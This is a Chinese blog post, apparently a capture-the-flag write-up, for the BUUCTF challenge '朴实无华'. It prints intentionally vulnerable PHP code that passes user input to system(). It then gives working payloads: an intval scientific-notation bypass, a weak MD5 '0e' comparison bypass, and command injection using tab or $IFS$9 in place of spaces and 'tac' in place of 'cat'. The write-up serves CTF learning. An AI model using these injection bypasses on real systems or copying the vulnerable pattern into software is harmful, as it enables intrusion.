buuctf-朴实无华

最新推荐文章于 2023-09-19 17:45:08 发布
最新推荐文章于 2023-09-19 17:45:08 发布
阅读量300 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/123995994
版权

扫目录也没扫出什么东西

标题上有bot,想到robots.txt(有点牵强)

继续查

 然后线索就断了,但是这个页面应该不会没用,抓包看看(之前页面中header information-headers可能也暗示了查看头文件)

  然后是一串乱码,可以在火狐浏览器的更多工具里查找修复文字编码

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

一共有三个判断

if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}

这个判断一看就不能用正常逻辑进行

会把整数部分截取出来

判断的前半段截取后的整数小于2020,判断的后半段先加1再截取,按照这个逻辑选择数字

1e7就可以

前半段判断是1,后半段是1*10^7+1(会按照科学计数法进行) 

if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

这个是要原数字和md5加密后的数字相等(弱比较),应该是要不断尝试了

0e215962017

if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}

 第三段直接通过system()输入命令

但是不能出现空格,cat也会被换掉

?num=1e7&md5=0e215962017&get_flag=ls

?num=1e7&md5=0e215962017&get_flag=tac%09fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

也可以代替空格$IFS$9

 

m0_62094846
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
buu做题笔记——[WUSTCTF2020]朴实无华&[BSidesCF 2020]Had a bad day
weixin_46330722的博客
11-07 458
BUU[WUSTCTF2020]朴实无华robots.txtresponselevel 1level 2level 3[BSidesCF 2020]Had a bad day [WUSTCTF2020]朴实无华 robots.txt 进入题目界面就一个Hack me,抓包也没看到啥有用的。dirsearch开启 ! 扫一扫有没有什么有用的,但是全都429,只能手动扫描了。备份文件,git泄露,robots协议…全都试一遍 。终于在robots.txt里找到了有用的东西。 response 访问是一个有
buuctf-[WUSTCTF2020]朴实无华(小宇特详解)
小宇的web博客
02-23 1019
buuctf-[WUSTCTF2020]朴实无华(小宇特详解) 1.这里先看题目 2.然后去查看一下robots.txt,看一下爬虫规则。 3.提示是/fAke_f1agggg.php,这里访问并查看f12的网络 这里发现了/fl4g.php的提示,尝试访问 4.访问/fl4g.php,这里如果出现乱码问题请参考我的文章 (1条消息) 如何修复火狐浏览器的乱码问题(最新版)_小宇的web博客-CSDN博客 <?php header('Content-type:text/html;charset=
BUUCTF [WUSTCTF2020] 朴实无华
Senimo
12-16 1076
BUUCTF [WUSTCTF2020]朴实无华 考点: intval()函数科学计数法绕过 网页Unicode编码 变量md5()加密后与原值相等 nl、tac等替代cat命令 启动靶机: 根据标签名: <title>人间极乐bot</title> 猜测可能有robots.txt协议,访问: 得到假的flag: 根据之前的Warning: 猜测和请求头有关,使用BurpSuite抓取数据包: 在Response中发现新的提示: Look_at_me: /fl4g.p
BUUCTF之[WUSTCTF2020]朴实无华 --------------- MD5碰撞
weixin_44632787的博客
10-07 701
启动挑战页面 访问一下robots.txt看看有没有什么提示 发现有个可疑的链接:/fAke_f1agggg.php 到这里就可以看到重要的源码了 <img src="/img.jpg"> <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //level 1 if (isset($_GET['num'])){ $num .
BUUCTF WEB 朴实无华1
qq_41696858的博客
12-21 184
打开场景,一堆乱码,让我们不要看headers,那不用说了,肯定hint在headers里面,burp抓包,当前页面headers没有啥的 那就扫目录吧,扫出来一个robots.txt,进 有一个fAke_flaaaaag.php,很明显是假的,我们再看headers头还是没有啥有用的 访问/fAke_flaaaaag.php,这次抓包发现一个look at me头,终于发现了正确的flag地址:/fl4g.php 什么,这就满足了?naive!访问下来是一堆源码,代码审计 <?php header(
BUUCTF:[WUSTCTF2020]朴实无华
末初的CSDN博客
06-24 1056
首先在下发现 访问有一个假的flag,但是在响应头中找到一个提示,另外还有一个值得注意的是这里是 访问得到 PHP5中的函数中科学计数法符号无效,只会当作正常字符处理 所以这里利用科学计数法的符号就可以绕过level 1level 2直接可参考我的这篇文章:浅谈PHP中哈希比较缺陷问题及哈希强比较相关问题最后直接绕过和即可...
朴实无华的自我介绍精选.doc
10-11
朴实无华的自我介绍精选 本文档提供了一个完整的自我介绍示例,涵盖了个人基本信息、教育背景、工作经历、职业目标、个人性格等多个方面的内容。以下是本文档中所涉及的知识点: 1. 自我介绍的基本结构:自我介绍...
note:就是一个朴实无华的笔记本
04-02
对数序列就是一个朴实无华的笔记本
logseq:就是一个朴实无华的笔记本
03-29
对数序列 就是一个朴实无华的笔记本
bemaker:WELL项目建设者
06-09
安装 npm install bemaker项目文件结构Bemaker 对文件结构尽可能朴实无华。 与常规文件一起, 也包含在程序集中。 预计有一个包含块目录的目录,在每个目录中,块文件位于任意层次结构中。 例如: blocks/ button/ ...
创想颖峰学校OA系统 v5.91.zip
07-12
1、界面简洁,朴实无华。各种功能,一览无遗,简单实用。 2、配合OA精灵使用,迅速、及时。使学校内部通知、邮件通行无阻,及时传递。 3、除了基本办公功能,集成学校常见的功能。专业、专注、实用,例如部门文件...
buuctf-[WUSTCTF2020]朴实无华
最新发布
2202_75317918的博客
09-19 319
buuctf-[WUSTCTF2020]朴实无华
web buuctf [WUSTCTF2020]朴实无华
weixin_44214568的博客
04-01 388
1. 根据提示消息应该在头部 2.查看robots.txt (搜索引擎中访问网站的时候要查看的第一个文件) 访问 3.根据头部查看请求头和响应头 4.查看,打开网页里面对汉字的编译是乱码,在火狐浏览器中定制工具里有一个页面编辑的选项,对页面进行编辑,得到源码: <?php header('Content-type:text/html;charset=utf-8'); error_reporting(0); highlight_file(__file__); //...
[WUSTCTF2020]朴实无华 1
m0_62879498的博客
05-07 1305
[WUSTCTF2020]朴实无华 1 进入环境,什么也没有得到,估计就是需要我们进行目录扫描了 用dirsearch进行把爆破扫描 环境的问题,很多的环境在进行扫描的时候,如果访问过快,就会返回429 ,建议将线程数调小,否则会出现文件 429请况,影响结果 dirsearch.py -e bak,zip,tgz,txt -u https://target -t 30 我们尝试访问文件 访问 fAke_f1agggg.php 使用 bp抓包 查看情况 发现了新的文件,尝试访问 发现了朱
BUU-WEB-[WUSTCTF2020]朴实无华
qq_24033605的博客
05-18 184
[WUSTCTF2020]朴实无华 点开网页,就是让咱hack它~~(这么无理的要求满足你)~~ ,查看源码,看看有没有其他提示。 发现乱码了,于是利用火狐修改一下编码方式。(按alt键) bot,难道是robot协议。先查看一下吧。 找到了个爬虫爬不到的网页,进去看一看。 这题要是那么简单就好了 源码里也没有提示,抓个包看一下吧。 又找到了页面。 (老样子,乱码转成unicode就不乱了) <?php header('Content-type:text/html;charset=utf
[WUSTCTF2020]朴实无华
zxnimud5的专栏
09-12 228
浏览器标题有乱码 编码调成unicode robots.txt : /fAke_f1agggg.php 访问后啥也没有 用burp看 这里必须采用代理拦截 不拦截啥都看不到 burp里右边响应头里有提示,/fl4g.php 然后代码审计 //level1 if(isset($_GET['num'])){ $num=$_GET['num']; if(intval($num)<2020&&intval($num+1)...
file_include(攻防世界)
m0_56107268的博客
11-14 6959
php转化器的学习
PHP配置文件经典漏洞
weixin_30352645的博客
03-23 179
phithon师父在小蜜圈里放了一个经典的配置文件写入问题漏洞. <?phpif(!isset($_GET['option'])) die();$str = addslashes($_GET['option']);$file = file_get_contents('./config.php');$file = preg_replace('|\$option=\'.*\';|', "...
CTFshow】命令执行web29-web54
weixin_51614272的博客
02-23 2507
web29 源码 if(isset($_GET['c'])){ $c = $_GET['c']; if(!preg_match("/flag/i", $c)){ eval($c); } }else{ highlight_file(__FILE__); } eval函数,把GET方法获取的变量c内容,当做命令去执行 过滤了flag关键字,不区分大小写 构造payload: ?c=system("tac fla?.php"); ?c=system("t
编写程序一段文字,输出文本中所有长度为四个字的词语text=,诚朴求是 博学笃行 大阳石精神-朴实无华 坚韧顽强 无私奉献
05-25
text = "诚朴求是 博学笃行 大阳石精神-朴实无华 坚韧顽强 无私奉献" words = text.split() four_letter_words = [word for word in words if len(word) == 4] print(four_letter_words) ``` 输出: ```python ['...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值